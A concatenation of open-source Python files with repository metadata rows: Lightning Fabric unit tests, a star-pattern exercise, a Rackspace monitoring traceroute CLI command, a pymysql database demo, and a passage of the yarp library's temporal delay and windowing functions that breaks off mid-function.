"lightning.fabric.fabric.Fabric.device",
new_callable=PropertyMock,
return_value=torch.device("cuda", 1),
)
def test_setup_dataloaders_move_to_device(fabric_device_mock):
"""Test that the setup configures FabricDataLoader to move the data to the device automatically."""
fabric = Fabric(devices=1)
fabric_dataloaders = fabric.setup_dataloaders(DataLoader(Mock()), DataLoader(Mock()), move_to_device=False)
assert all(dl.device is None for dl in fabric_dataloaders)
fabric_device_mock.assert_not_called()
fabric = Fabric(devices=1)
fabric_dataloaders = fabric.setup_dataloaders(DataLoader(Mock()), DataLoader(Mock()), move_to_device=True)
assert all(dl.device == torch.device("cuda", 1) for dl in fabric_dataloaders)
fabric_device_mock.assert_called()
def test_setup_dataloaders_distributed_sampler_not_needed():
"""Test that `use_distributed_sampler` option has no effect when no distributed sampler is needed."""
custom_sampler = Mock(spec=Sampler)
dataloader = DataLoader(Mock(), sampler=custom_sampler)
# keep the custom sampler when not needed to replace
fabric = Fabric(devices=1)
fabric_dataloader = fabric.setup_dataloaders(dataloader, use_distributed_sampler=True)
assert fabric_dataloader.sampler is custom_sampler
def test_setup_dataloaders_distributed_sampler_shuffle():
"""Test that the DataLoader(shuffle=True|False) setting gets carried over correctly into the distributed
sampler."""
fabric = Fabric(accelerator="cpu", strategy="ddp_spawn", devices=2)
# no fabric.launch(): pretend we are on rank 0 now
dataset = TensorDataset(torch.arange(8))
# shuffling turned off
no_shuffle_dataloaders = [
DataLoader(dataset),
DataLoader(dataset, shuffle=False),
DataLoader(dataset, sampler=SequentialSampler(dataset)),
]
for dataloader in no_shuffle_dataloaders:
dataloader = fabric.setup_dataloaders(dataloader)
assert [t[0].item() for t in iter(dataloader)] == [0, 2, 4, 6]
# shuffling turned on
shuffle_dataloaders = [DataLoader(dataset, shuffle=True), DataLoader(dataset, sampler=RandomSampler(dataset))]
for dataloader in shuffle_dataloaders:
seed_everything(1)
dataloader = fabric.setup_dataloaders(dataloader)
assert [t[0].item() for t in iter(dataloader)] == [5, 2, 7, 1]
@pytest.mark.parametrize("shuffle", [True, False])
@pytest.mark.parametrize("batch_size", [1, 2, 3])
def test_setup_dataloaders_distributed_sampler_parity(shuffle, batch_size):
"""Test that the distributed sampler setup in Fabric leads to the same sequence of data as in raw PyTorch."""
torch.manual_seed(1)
fabric = Fabric(accelerator="cpu", strategy="ddp", devices=2)
# no fabric.launch(): pretend we are on rank 0 now
dataset = torch.arange(10)
torch_dataloader = DataLoader(
dataset,
sampler=DistributedSampler(dataset, num_replicas=2, rank=0, shuffle=shuffle),
batch_size=batch_size,
)
fabric_dataloader = DataLoader(dataset, shuffle=shuffle, batch_size=batch_size)
fabric_dataloader = fabric.setup_dataloaders(fabric_dataloader)
def fetch_epoch(loader):
iterator = iter(loader)
# we fetch 2 batches per epoch
return torch.cat((next(iterator), next(iterator)))
# 1st epoch
# PyTorch users needs to set the epoch, while in Fabric it gets handled automatically
torch_dataloader.sampler.set_epoch(0)
torch_data = fetch_epoch(torch_dataloader)
fabric_data = fetch_epoch(fabric_dataloader)
assert torch.equal(torch_data, fabric_data)
# 2nd epoch
# PyTorch users needs to set the epoch, while in Fabric it gets handled automatically
torch_dataloader.sampler.set_epoch(1)
torch_data = fetch_epoch(torch_dataloader)
fabric_data = fetch_epoch(fabric_dataloader)
assert torch.equal(torch_data, fabric_data)
assert torch_dataloader.sampler.epoch == 1
assert fabric_dataloader._dataloader.sampler.epoch == 1
@mock.patch.dict(os.environ, {}, clear=True)
def test_seed_everything():
"""Test that seed everything is static and sets the worker init function on the dataloader."""
Fabric.seed_everything(3)
fabric = Fabric(devices=1)
fabric_dataloader = fabric.setup_dataloaders(DataLoader(Mock()))
assert fabric_dataloader.worker_init_fn.func is pl_worker_init_function
assert os.environ == {"PL_GLOBAL_SEED": "3", "PL_SEED_WORKERS": "1"}
@pytest.mark.parametrize(
"strategy",
[
"dp",
"ddp",
"ddp_spawn",
pytest.param("ddp_fork", marks=RunIf(skip_windows=True)),
pytest.param("deepspeed", marks=RunIf(deepspeed=True)),
],
)
def test_setup_dataloaders_replace_custom_sampler(strategy):
"""Test that asking to replace a custom sampler results in an error when a distributed sampler would be
needed."""
custom_sampler = Mock(spec=Sampler)
dataloader = DataLoader(Mock(), sampler=custom_sampler)
# explicitly asking to replace when a custom sampler is already configured raises an exception
fabric = Fabric(accelerator="cpu", strategy=strategy, devices=2)
if hasattr(fabric.strategy, "distributed_sampler_kwargs"):
with pytest.raises(TypeError, match="You seem to have configured a sampler in your DataLoader"):
fabric.setup_dataloaders(dataloader, use_distributed_sampler=True)
# setting `use_distributed_sampler=False` leaves the sampler untouched
fabric_dataloader = fabric.setup_dataloaders(dataloader, use_distributed_sampler=False)
assert fabric_dataloader.sampler is custom_sampler
@pytest.mark.parametrize(
"strategy",
[
"dp",
"ddp",
"ddp_spawn",
pytest.param("ddp_fork", marks=RunIf(skip_windows=True)),
pytest.param("deepspeed", marks=RunIf(deepspeed=True)),
],
)
@pytest.mark.parametrize("shuffle", [True, False])
def test_setup_dataloaders_replace_standard_sampler(shuffle, strategy):
"""Test that Fabric replaces the default samplers with DistributedSampler automatically."""
fabric = Fabric(accelerator="cpu", strategy=strategy, devices=2)
is_distributed = hasattr(fabric.strategy, "distributed_sampler_kwargs")
fabric_dataloader = fabric.setup_dataloaders(DataLoader(range(3), shuffle=shuffle))
assert not is_distributed or isinstance(fabric_dataloader.sampler, DistributedSampler)
@pytest.mark.parametrize(
"accelerator, expected",
[
("cpu", "cpu"),
pytest.param("cuda", "cuda:0", marks=RunIf(min_cuda_gpus=1)),
pytest.param("gpu", "cuda:0", marks=RunIf(min_cuda_gpus=1)),
pytest.param("tpu", "xla:0", marks=RunIf(tpu=True, standalone=True)),
pytest.param("mps", "mps:0", marks=RunIf(mps=True)),
pytest.param("gpu", "mps:0", marks=RunIf(mps=True)),
],
)
@mock.patch.dict(os.environ, os.environ.copy(), clear=True)
def test_to_device(accelerator, expected):
"""Test that the to_device method can move various objects to the device determined by the accelerator."""
if accelerator == "tpu":
from torch_xla.experimental import pjrt
if not pjrt.using_pjrt():
expected = "xla:1"
class RunFabric(Fabric):
def run(self):
expected_device = torch.device(expected)
# module
module = torch.nn.Linear(2, 3)
module = fabric.to_device(module)
assert all(param.device == expected_device for param in module.parameters())
# tensor
tensor = torch.rand(2, 2)
tensor = fabric.to_device(tensor)
assert tensor.device == expected_device
# collection
collection = {"data": torch.rand(2, 2), "int": 1}
collection = fabric.to_device(collection)
assert collection["data"].device == expected_device
fabric = RunFabric(accelerator=accelerator, devices=1)
fabric.run()
def test_rank_properties():
"""Test that the rank properties are determined by the strategy."""
fabric = Fabric()
fabric._strategy = Mock(spec=Strategy)
fabric._strategy.world_size = 1000
assert fabric.world_size == 1000
fabric._strategy.global_rank = 100
assert fabric.global_rank == 100
fabric._strategy.local_rank = 10
assert fabric.local_rank == 10
fabric._strategy.node_rank = 1
assert fabric.node_rank == 1
def test_backward():
"""Test that backward() calls into the precision plugin."""
fabric = Fabric()
fabric._strategy = Mock(spec=Precision)
loss = Mock()
fabric.backward(loss, "arg", keyword="kwarg")
fabric._strategy.backward.assert_called_with(loss, None, "arg", keyword="kwarg")
@RunIf(deepspeed=True, mps=False)
def test_backward_model_input_required():
"""Test that when using deepspeed and multiple models, backward() requires the model as input."""
fabric = Fabric(strategy="deepspeed")
model0 = nn.Linear(1, 2)
model1 = nn.Linear(1, 2)
optimizer0 = torch.optim.Adam(model0.parameters())
optimizer1 = torch.optim.Adam(model1.parameters())
fabric._strategy.setup_module_and_optimizers = lambda *args: args
fabric.setup(model0, optimizer0)
fabric.setup(model1, optimizer1)
loss = model0(torch.randn(1, 1, device=fabric.device)).sum()
with pytest.raises(ValueError, match="please provide the model used to perform"):
fabric.backward(loss)
def test_autocast():
"""Test that the Fabric autocast context manager lets the precision plugin handle casting."""
fabric = Fabric()
fabric._precision.forward_context = MagicMock()
fabric._precision.forward_context().__enter__.assert_not_called()
with fabric.autocast():
fabric._precision.forward_context().__enter__.assert_called()
fabric._precision.forward_context().__exit__.assert_called()
def test_no_backward_sync():
"""Test that `Fabric.no_backward_sync()` validates the strategy and model is compatible."""
fabric = Fabric(devices=1)
model = nn.Linear(3, 3)
with pytest.raises(TypeError, match="You need to set up the model first"), fabric.no_backward_sync(model):
pass
model = fabric.setup(model)
# pretend that the strategy does not support skipping backward sync
fabric._strategy = Mock(spec=ParallelStrategy, _backward_sync_control=None)
with pytest.warns(
PossibleUserWarning, match="The `ParallelStrategy` does not support skipping the"
), fabric.no_backward_sync(model):
pass
# for single-device strategies, it becomes a no-op without warning
fabric._strategy = Mock(spec=SingleDeviceStrategy, _backward_sync_control=MagicMock())
with fabric.no_backward_sync(model):
pass
fabric._strategy._backward_sync_control.no_backward_sync.assert_not_called()
# pretend that the strategy supports skipping backward sync
fabric._strategy = Mock(_backward_sync_control=MagicMock())
# disabling the context manager makes it a no-op
with fabric.no_backward_sync(model, enabled=False):
pass
fabric._strategy._backward_sync_control.no_backward_sync.assert_not_called()
# when enabld, the wrapped module gets passed down
with fabric.no_backward_sync(model):
pass
fabric._strategy._backward_sync_control.no_backward_sync.assert_called_once_with(model._forward_module)
def test_launch_without_function():
"""Test the various ways `Fabric.launch()` can be called."""
# default: no launcher, single process
fabric = Fabric()
nothing = Mock()
fabric.launch(nothing)
nothing.assert_called()
# with a launcher on the strategy
fabric = Fabric()
fabric._strategy._launcher = Mock()
fabric.launch()
fabric._strategy._launcher.launch.assert_called()
def test_launch_with_function():
"""Test the various ways `Fabric.launch(function)` can be called."""
def fn_without_args():
pass
fabric = Fabric()
with pytest.raises(TypeError, match="needs to take at least one argument"):
fabric.launch(fn_without_args)
def fn_with_one_arg(arg):
assert isinstance(arg, Fabric)
fn_with_one_arg.called = True
fabric = Fabric()
fabric.launch(fn_with_one_arg)
assert fn_with_one_arg.called
# common user mistake
fabric = Fabric()
with pytest.raises(TypeError, match="needs to be a callable"):
fabric.launch(fn_with_one_arg(fabric))
@mock.patch.dict(os.environ, {"LT_CLI_USED": "1"}) # pretend we are using the CLI
def test_launch_and_cli_not_allowed():
fabric = Fabric(devices=1)
with pytest.raises(RuntimeError, match=escape("Calling `.launch()` again is not allowed")):
fabric.launch()
@RunIf(mps=False)
@pytest.mark.parametrize("strategy", ("xla", "ddp_spawn"))
def test_launch_and_strategies_unsupported_combinations(strategy, xla_available):
fabric = Fabric(strategy=strategy)
with pytest.raises(TypeError, match=r"launch\(\)` needs to be called with a function"):
fabric.launch()
@mock.patch.dict(os.environ, {"LT_CLI_USED": "1"}) # pretend we are using the CLI
def test_overridden_run_and_cli_not_allowed():
class FabricWithRun(Fabric):
def run(self):
pass
with pytest.raises(TypeError, match=escape("Overriding `Fabric.run()` and launching from the CLI is not allowed")):
FabricWithRun()
def test_module_sharding_context():
"""Test that the sharding context manager gets applied when the strategy supports it and is a no-op
otherwise."""
fabric = Fabric()
fabric._strategy = MagicMock(spec=DDPStrategy, module_sharded_context=Mock())
with pytest.warns(DeprecationWarning, match="sharded_model"), fabric.sharded_model():
pass
fabric._strategy.module_sharded_context.assert_not_called()
fabric._strategy = MagicMock(spec=_Sharded)
with pytest.warns(DeprecationWarning, match="sharded_model"), fabric.sharded_model():
pass
fabric._strategy.module_sharded_context.assert_called_once()
def test_init_module_context(monkeypatch):
"""Test that the stratey returns the context manager for initializing the module."""
import lightning.fabric
fabric = Fabric(accelerator="cpu")
strategy = MagicMock(spec=Strategy, module_init_context=MagicMock(), root_device=torch.device("cuda", 0))
fabric._strategy = strategy
with fabric.init_module():
pass
strategy.module_init_context.assert_called_once()
strategy.reset_mock()
# Pretend we are using PyTorch < 2.0
monkeypatch.setattr(lightning.fabric.fabric, "_TORCH_GREATER_EQUAL_2_0", False)
with pytest.warns(PossibleUserWarning, match="can't place the model parameters on the device"): # noqa: SIM117
with fabric.init_module():
pass
strategy.module_init_context.assert_called_once()
def test_callbacks_input():
"""Test the various ways in which callbacks can be registered with Fabric."""
callback0 = Mock()
callback1 = Mock()
# single callback
fabric = Fabric(callbacks=callback0)
assert fabric._callbacks == [callback0]
# multiple callbacks
fabric = Fabric(callbacks=[callback0, callback1])
assert fabric._callbacks == [callback0, callback1]
def test_call():
"""Test that `fabric.call` triggers the callback implementations."""
callback0 = Mock()
callback1 = Mock()
fabric = Fabric(callbacks=[callback0, callback1])
# No arguments
fabric.call("on_train_end")
callback0.on_train_end.assert_called_once()
callback1.on_train_end.assert_called_once()
# Optional arguments
fabric.call("on_train_end", "positional", keyword="keyword")
callback0.on_train_end.assert_called_with("positional", keyword="keyword")
callback1.on_train_end.assert_called_with("positional", keyword="keyword")
# Some callbacks don't implement the requested hook
callback0 = Mock()
callback1 = Mock(spec_set={}) # `on_train_end` not defined for this callback
fabric = Fabric(callbacks=[callback0, callback1])
fabric.call("on_train_end")
callback0.on_train_end.assert_called_once()
assert not callback1.mock_calls # no methods were called on callback1
# Skip callback attributes that are not callable
callback = Mock(not_a_method=1)
fabric = Fabric(callbacks=[callback])
with pytest.warns(UserWarning, match="Skipping the callback `Mock.not_a_method`"):
fabric.call("not_a_method")
assert not callback1.mock_calls
def test_loggers_input():
"""Test the various ways in which loggers can be registered with Fabric."""
logger0 = Mock()
logger1 = Mock()
# no logger
fabric = Fabric(loggers=None)
assert fabric._loggers == []
fabric = Fabric(loggers=[])
assert fabric._loggers == []
# single logger
fabric = Fabric(loggers=logger0)
assert fabric._loggers == [logger0]
# multiple loggers
fabric = Fabric(loggers=[logger0, logger1])
assert fabric._loggers == [logger0, logger1]
def test_log():
"""Test that `fabric.log` sends the metrics to each logger."""
logger0 = Mock()
logger1 = Mock()
fabric = Fabric(loggers=[logger0, logger1])
fabric.log("test", 1)
logger0.log_metrics.assert_called_with(metrics={"test": 1}, step=None)
logger1.log_metrics.assert_called_with(metrics={"test": 1}, step=None)
fabric.log("test", 2, step=15)
logger0.log_metrics.assert_called_with(metrics={"test": 2}, step=15)
logger1.log_metrics.assert_called_with(metrics={"test": 2}, step=15)
def test_log_dict():
"""Test that `fabric.log_dict` sends the metrics dict to each logger."""
logger0 = Mock()
logger1 = Mock()
fabric = Fabric(loggers=[logger0, logger1])
fabric.log_dict({"foo": 1, "bar": 2}, step=None)
logger0.log_metrics.assert_called_with(metrics={"foo": 1, "bar": 2}, step=None)
logger1.log_metrics.assert_called_with(metrics={"foo": 1, "bar": 2}, step=None)
fabric.log_dict({"foo": 3, "bar": 4}, step=15)
logger0.log_metrics.assert_called_with(metrics={"foo": 3, "bar": 4}, step=15)
logger1.log_metrics.assert_called_with(metrics={"foo": 3, "bar": 4}, step=15)
def test_log_dict_input_parsing():
"""Test validation of input data types and preprocessing."""
logger = Mock()
fabric = Fabric(loggers=[logger])
# Tensor scalar, 0 dims
fabric.log("log", torch.tensor(1))
logger.log_metrics.assert_called_with(metrics={"log": 1}, step=None)
fabric.log_dict({"log_dict": torch.tensor(1)})
logger.log_metrics.assert_called_with(metrics={"log_dict": 1}, step=None)
# Tensor scalar, 1 dims
fabric.log("log", torch.tensor([2]))
logger.log_metrics.assert_called_with(metrics={"log": 2}, step=None)
fabric.log_dict({"log_dict": torch.tensor([2])})
logger.log_metrics.assert_called_with(metrics={"log_dict": 2}, step=None)
# Tensor, multiple dims
with pytest.raises(ValueError, match="it cannot be converted to a scalar."):
fabric.log("log", torch.tensor([3, 4]))
with pytest.raises(ValueError, match="it cannot be converted to a scalar."):
fabric.log_dict({"log_dict": torch.tensor([3, 4])})
@pytest.mark.parametrize("setup", [True, False])
def test_save_wrapped_objects(setup, tmp_path):
"""Test that when modules and optimizers are in the state, they get unwrapped properly."""
fabric = Fabric(devices=1)
save_checkpoint_mock = Mock()
fabric.strategy.save_checkpoint = save_checkpoint_mock
unwrapped_model = BoringModel()
unwrapped_optimizer = torch.optim.Adam(unwrapped_model.parameters())
if setup:
model, optimizer = fabric.setup(unwrapped_model, unwrapped_optimizer)
assert isinstance(model, _FabricModule)
assert isinstance(optimizer, _FabricOptimizer)
else:
model, optimizer = unwrapped_model, unwrapped_optimizer
anything = {"cocofruit": 1}
state = {"model": model, "optimizer": optimizer, "anything": anything}
expected = {"model": unwrapped_model, "optimizer": unwrapped_optimizer, "anything": anything}
fabric.save(tmp_path, state)
save_checkpoint_mock.assert_called_with(state=expected, path=tmp_path)
@pytest.mark.parametrize("setup", [True, False])
def test_load_wrapped_objects(setup, tmp_path):
"""Test that loading happens in-place for model, optimizer, and other user data."""
fabric = Fabric(accelerator="cpu")
expected_remainder = {"extra": "data"}
def mocked_load_checkpoint(path, state):
assert not isinstance(state["model"], _FabricModule)
assert not isinstance(state["optimizer"], _FabricOptimizer)
state.update({"int": 5, "dict": {"x": 1}})
return expected_remainder
fabric.strategy.load_checkpoint = mocked_load_checkpoint
unwrapped_model = BoringModel()
unwrapped_optimizer = torch.optim.Adam(unwrapped_model.parameters())
if setup:
model, optimizer = fabric.setup(unwrapped_model, unwrapped_optimizer)
assert isinstance(model, _FabricModule)
assert isinstance(optimizer, _FabricOptimizer)
else:
model, optimizer = unwrapped_model, unwrapped_optimizer
state = {"model": model, "optimizer": optimizer, "int": 0, "dict": {"x": 0}}
expected = {"model": model, "optimizer": optimizer, "int": 5, "dict": {"x": 1}}
remainder = fabric.load(tmp_path, state)
assert state == expected
assert remainder == expected_remainder
def test_barrier():
"""Test that `Fabric.barrier()` calls into the strategy."""
fabric = Fabric()
fabric._strategy = Mock()
fabric.barrier("test")
fabric._strategy.barrier.assert_called_once_with(name="test")
def test_broadcast():
"""Test that `Fabric.broadcast()` calls into the strategy."""
fabric = Fabric()
fabric._strategy = Mock()
fabric.broadcast(torch.tensor(1), src=2)
fabric._strategy.broadcast.assert_called_once_with(torch.tensor(1), src=2)
def test_all_gather():
"""Test that `Fabric.all_gather()` applies itself to collections and calls into the strategy."""
fabric = Fabric()
fabric._strategy = Mock(root_device=torch.device("cpu"))
defaults = {"group": None, "sync_grads": False}
# single tensor
fabric.all_gather(torch.tensor(1))
fabric._strategy.all_gather.assert_called_once_with(torch.tensor(1), **defaults)
fabric._strategy.reset_mock()
# list
fabric.all_gather([torch.tensor(2), torch.tensor(3), "string"])
fabric._strategy.all_gather.assert_has_calls([call(torch.tensor(2), **defaults), call(torch.tensor(3), **defaults)])
fabric._strategy.reset_mock()
# dict
fabric.all_gather({"a": torch.tensor(4), "b": [torch.tensor(5)], "c": "string"})
fabric._strategy.all_gather.assert_has_calls([call(torch.tensor(4), **defaults), call(torch.tensor(5), **defaults)])
def test_all_reduce():
"""Test that `Fabric.all_reduce()` applies itself to collections and calls into the strategy."""
fabric = Fabric()
fabric._strategy = Mock(root_device=torch.device("cpu"))
defaults = {"group": None, "reduce_op": "mean"}
# single tensor
fabric.all_reduce(torch.tensor(1))
fabric._strategy.all_reduce.assert_called_once_with(torch.tensor(1), **defaults)
fabric._strategy.reset_mock()
# list
fabric.all_reduce([torch.tensor(2), torch.tensor(3), "string"])
fabric._strategy.all_reduce.assert_has_calls([call(torch.tensor(2), **defaults), call(torch.tensor(3), **defaults)])
fabric._strategy.reset_mock()
# dict
fabric.all_reduce({"a": torch.tensor(4), "b": [torch.tensor(5)], "c": "string"})
fabric._strategy.all_reduce.assert_has_calls([call(torch.tensor(4), **defaults), call(torch.tensor(5), **defaults)])
@pytest.mark.parametrize("clip_val,max_norm", [(1e-3, None), (None, 1)])
def test_grad_clipping(clip_val, max_norm):
fabric = Fabric(devices=1)
fabric.strategy.clip_gradients_norm = Mock()
fabric.strategy.clip_gradients_value = Mock()
torch_model = nn.Linear(1, 1)
torch_optimizer = torch.optim.SGD(torch_model.parameters(), lr=1e-3)
model, optimizer = fabric.setup(torch_model, torch_optimizer)
loss = model(torch.rand(1, 1).to(fabric.device))
fabric.backward(loss)
fabric.strategy.clip_gradients_value.assert_not_called()
fabric.strategy.clip_gradients_norm.assert_not_called()
fabric.clip_gradients(model, optimizer, max_norm=max_norm, clip_val=clip_val)
if clip_val is not None:
fabric.strategy.clip_gradients_value.assert_called_once_with(torch_model, torch_optimizer, clip_val=clip_val)
fabric.strategy.clip_gradients_norm.assert_not_called()
else:
fabric.strategy.clip_gradients_value.assert_not_called()
fabric.strategy.clip_gradients_norm.assert_called_once_with(
torch_model, torch_optimizer, max_norm=max_norm, norm_type=2.0, error_if_nonfinite=True
)
| [
"noreply@github.com"
] | SkafteNicki.noreply@github.com |
72400439926869248265447bf85cbabdb44fbf32 | 25b0e82ec0ba2b667e6ae429e59e19333a641723 | /Python/NPTEL/src/Week7/P10.py | 6a2578fdb3ed31ec6069f5236a04636495a1740f | [] | no_license | donkhan/msc | cf897a6dbfd72845074d13842351e49ebcf04557 | 73bc12fd3ad86e6915f51adc08af836dfdc52747 | refs/heads/master | 2021-07-10T06:43:52.687825 | 2020-11-09T06:54:14 | 2020-11-09T06:54:14 | 211,588,078 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 563 | py | def func():
print()
c = 10
i = 3
while i <= 6:
j = 0
while j <= 20:
if j >= 10-i and j <= 10+i:
print("*",end = " ")
else:
print(" ",end = " ")
j = j + 1
print("\n")
i = i + 1
i = 6
while i >= 3:
j = 0
while j<= 20:
if j >= 10 - i and j <= 10 + i:
print("*", end=" ")
else:
print(" ", end=" ")
j = j + 1
print("\n")
i = i - 1
func()
| [
"donkhan"
] | donkhan |
a551061f954363fe867ae576ead48d3683dcf790 | 0f1bec24ebc7eab0a29ce433aef9ef937c91ebb7 | /commands/raxmon-monitoring-zones-traceroute | 1cc7f381fa91003d853fdb73e52ad896a86c003a | [] | no_license | bravelittlescientist/rackspace-monitoring-cli | d3f178cd1cb6e0b5675b6d2b46b0ecdaa9dcb210 | 600b08956e93fc8b61a095e4eaac45b7a637e8c1 | refs/heads/master | 2021-01-17T23:10:47.752809 | 2014-07-01T09:03:56 | 2014-07-01T09:03:56 | 21,474,623 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,677 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pprint import pprint
try:
import simplejson as json
except ImportError:
import json
from raxmon_cli.common import run_action
from raxmon_cli.utils import str_to_dict, str_to_list
OPTIONS = [
[['--id'], {'dest': 'id', 'help': 'Monitoring zone id'}],
[['--target'], {'dest': 'target', 'help': 'Target hostname or IP address'}],
[['--target-resolver'], {'dest': 'target_resolver', 'help': 'Target resolver', 'default': 'IPv4'}]
]
REQUIRED_OPTIONS = ['id', 'target']
def callback(driver, options, args, callback):
mz = driver.get_monitoring_zone(monitoring_zone_id=options.id)
result = driver.ex_traceroute(monitoring_zone=mz, target=options.target,
target_resolver=options.target_resolver)
pprint(result)
run_action(OPTIONS, REQUIRED_OPTIONS, 'monitoring_zones', 'traceroute',
callback)
| [
"tomaz@tomaz.me"
] | tomaz@tomaz.me | |
841aba801d2d071d8dab9e4d3c0c83c024477335 | 09a8648805c390594be0908da3188f287dedc471 | /src/fundamental/accessMySQL.py | 3f65949cbc8cda3b336ba5d34b37f441ec62c19a | [
"Apache-2.0"
] | permissive | lgonline/mp | 9d17abbb41ff42fbaf1666059504e2377485c6a9 | 21ef1bfb2feacf6a7abda858c083e0c49878f889 | refs/heads/master | 2020-12-29T02:36:32.332387 | 2019-11-16T03:02:02 | 2019-11-16T03:02:02 | 44,308,720 | 1 | 1 | null | 2015-10-20T16:24:08 | 2015-10-15T09:50:46 | Python | UTF-8 | Python | false | false | 1,190 | py | __author__ = 'Administrator'
import os,sys
import pymysql
def sampleConnMysql():
try:
conn = pymysql.connect(host='localhost',user='root',passwd='123456',db='bm',port=3306,charset='utf8')
cur=conn.cursor()
cur.execute('select userid,name,password from userinfo')
data=cur.fetchall()
for d in data:
print("userid: "+str(d[0])+' name: '+d[1]+" password: "+d[2])
cur.close()
conn.close()
except Exception:
print("the exception was throw.")
def connMySQLDemo():
import pymysql
conn = pymysql.Connection(host='127.0.0.1', user='root', passwd='123456')
cur = conn.cursor()
try:
cur.execute("drop database mpdb")
except Exception as e:
print(e)
finally:
pass
cur.execute("create database mpdb")
cur.execute("use mpdb")
cur.execute("create table users(id int,name varchar(8))")
cur.execute("insert into users values(1,'www'),(2,'cnblogs'),(3,'com'),(4,'peter')")
cur.execute('select * from users')
for row in cur.fetchall():
print(row)
cur.close()
conn.commit()
conn.close()
if __name__ == '__main__':
pass | [
"lg_online@hotmail.com"
] | lg_online@hotmail.com |
b4e3b4667c69118029a269934e52e7bb9da1a061 | a6c0f3914395569cdd637d9bdc2f83406977f7e6 | /yarp/temporal.py | d966a1c6cbae5fc866a5392ef97c90fdd00128e4 | [] | no_license | mossblaser/yarp | 524bb0b5275a37b8d34b54c0cd84bf6636ab5cab | 236892b4ee6b58c8b9c59c61b17b259c35851d43 | refs/heads/master | 2022-12-11T08:45:29.308116 | 2018-12-24T23:07:36 | 2018-12-24T23:07:36 | 121,685,509 | 4 | 1 | null | 2022-12-07T01:21:16 | 2018-02-15T21:34:48 | Python | UTF-8 | Python | false | false | 10,141 | py | """
Temporal filters for :py:class:`Value` values.
"""
import asyncio
from yarp import NoValue, Value, ensure_value
__names__ = [
"delay",
"time_window",
"rate_limit",
]
def delay(source_value, delay_seconds, loop=None):
r"""
Produce a time-delayed version of a :py:class:`Value`.
Supports both instantaneous and continous :py:class:`Values`. For
continuous :py:class:`Value`\ s, the initial value is set immediately.
The ``delay_seconds`` argument may be a constant or a Value giving the
number of seconds to delay value changes. If it is increased, previously
delayed values will be delayed further. If it is decreased, values which
should already have been output will be output rapidly one after another.
The ``loop`` argument should be an :py:class:`asyncio.BaseEventLoop` in
which the delays will be scheduled. If ``None``, the default loop is used.
"""
source_value = ensure_value(source_value)
delay_seconds = ensure_value(delay_seconds)
output_value = Value(source_value.value)
# An array of (insertion_time, value, instantaneous_value, handle)
# tuples for values due to be sent.
timers = []
loop = loop or asyncio.get_event_loop()
def pop_value():
"""Internal. Outputs a previously delayed value."""
insertion_time, value, instantaneous_value, handle = timers.pop(0)
output_value._value = value
output_value.set_instantaneous_value(instantaneous_value)
@source_value.on_value_changed
def on_source_value_changed(instantaneous_value):
"""Internal. Schedule an incoming value to be output later."""
insertion_time = loop.time()
handle = loop.call_at(insertion_time + delay_seconds.value,
pop_value)
timers.append((insertion_time, source_value.value, instantaneous_value, handle))
@delay_seconds.on_value_changed
def on_delay_seconds_changed(new_delay_seconds):
"""Internal. Handle the delay changing."""
nonlocal timers
now = loop.time()
max_age = delay_seconds.value
# Expire any delayed values which should have been removed by now
while timers:
insertion_time, value, instantaneous_value, handle = timers[0]
age = now - insertion_time
if age >= max_age:
handle.cancel()
pop_value()
else:
# If this timer is young enough, all others inserted after it
# must also be young enough.
break
# Update the timeouts of the remaining timers
def update_timer(it_v_iv_h):
insertion_time, value, instantaneous_value, handle = it_v_iv_h
handle.cancel()
return (insertion_time,
value,
instantaneous_value,
loop.call_at(insertion_time + delay_seconds.value,
pop_value))
timers = list(map(update_timer, timers))
return output_value
def time_window(source_value, duration, loop=None):
"""Produce a moving window over a :py:class:`Value`'s historical values
within a given time period.
This function treats the :py:class:`Value` it is passed as a persistent
:py:class:`Value`, even if it is instantaneous (since a window function
doesn't really have any meaning for an instantaneous value).
The ``duration`` may be a constant or a (persistent) Value giving the
window duration as a number of seconds. The duration should be a number of
seconds greater than zero and never be ``NoValue``. If the value is
reduced, previously inserted values will be expired earlier, possibly
immediately if they should already have expired. If the value is increased,
previously inserted values will have an increased timeout.
The ``loop`` argument should be an :py:class:`asyncio.BaseEventLoop` in
which windowing will be scheduled. If ``None``, the default loop is used.
"""
source_value = ensure_value(source_value)
output_value = Value([source_value.value])
# A queue of (insertion_time, handle) pairs for calls to expire values currently
# in the window.
timers = []
duration = ensure_value(duration)
loop = loop or asyncio.get_event_loop()
def expire_value():
"""Internal. Removes a value from the window."""
timers.pop(0)
output_value.value = output_value.value[1:]
def schedule_value_expiration():
"""
Internal. Drop a newly-inserted value from the window after the window
delay occurs.
"""
now = loop.time()
t = now + duration.value
timers.append((now, loop.call_at(t, expire_value)))
@source_value.on_value_changed
def on_source_value_changed(new_value):
"""Internal. Adds the new value to the window when the input changes."""
output_value.value = output_value.value + [new_value]
schedule_value_expiration()
@duration.on_value_changed
def on_duration_changed(_instantaneous_new_duration):
"""Internal. Handle changes in the specified window duration."""
nonlocal timers
# Immediately expire any values in the window older than the new
# duration.
now = loop.time()
new_duration = duration.value
while timers:
insertion_time, handle = timers[0]
age = now - insertion_time
if age > new_duration:
handle.cancel()
expire_value() # Side effect: removes handle from timers
else:
# Since the _timers array is in order, as soon as we encounter
# a young enough timer, all others after it will be younger
# still.
break
# Modify the timeouts of all previously inserted values
def modify_timeout(insertion_time_and_handle):
insertion_time, handle = insertion_time_and_handle
handle.cancel()
return (insertion_time,
loop.call_at(insertion_time + new_duration,
expire_value))
timers = [modify_timeout(t) for t in timers]
schedule_value_expiration()
return output_value
def rate_limit(source_value, min_interval=0.1, loop=None):
"""Prevent changes occurring above a particular rate, dropping or
postponing changes if necessary.
The ``min_interval`` argument may be a constant or a :py:class:`Value`. If
this value is decreased, currently delayed values will be output early (or
immediately if the value would have been output previously). If increased,
the current delay will be increased.
The ``loop`` argument should be an :py:class:`asyncio.BaseEventLoop` in
which the delays will be scheduled. If ``None``, the default loop is used.
"""
source_value = ensure_value(source_value)
